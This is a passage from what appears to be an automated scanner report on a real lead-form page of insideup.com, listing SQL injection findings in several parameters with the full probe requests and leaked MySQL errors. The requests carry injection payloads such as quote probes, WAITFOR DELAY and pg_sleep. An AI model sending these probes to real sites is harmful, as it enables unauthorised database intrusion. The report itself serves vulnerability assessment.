es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone''&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:31:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.380. http://www.insideup.com/ppc/leadflow/hins00/project.php [subcategoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The subcategoryId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the subcategoryId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002'&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6a6vnn46gbmtsp4adc5cketa53; path=/
Content-Length: 7318
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

1.381. http://www.insideup.com/ppc/leadflow/hins00/project.php [subcategoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The subcategoryId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the subcategoryId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002'&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:31:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002''&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:31:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.382. http://www.insideup.com/ppc/leadflow/hins00/project.php [website parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The website parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the website parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa'&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:38 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7238
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa''&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:38 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.383. http://www.insideup.com/ppc/leadflow/hins00/project.php [website parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The website parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the website parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa'&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=lficlmk3fgup56cko45l5qed05; path=/
Content-Length: 7318
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

1.384. http://www.insideup.com/ppc/leadflow/hins00/project.php [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The zip parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the zip parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=aapetqcgicg0tpdsdb6nlg74r4; path=/
Content-Length: 7318
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

1.385. http://www.insideup.com/ppc/leadflow/hins00/project.php [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The zip parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zip parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:32:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:32:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
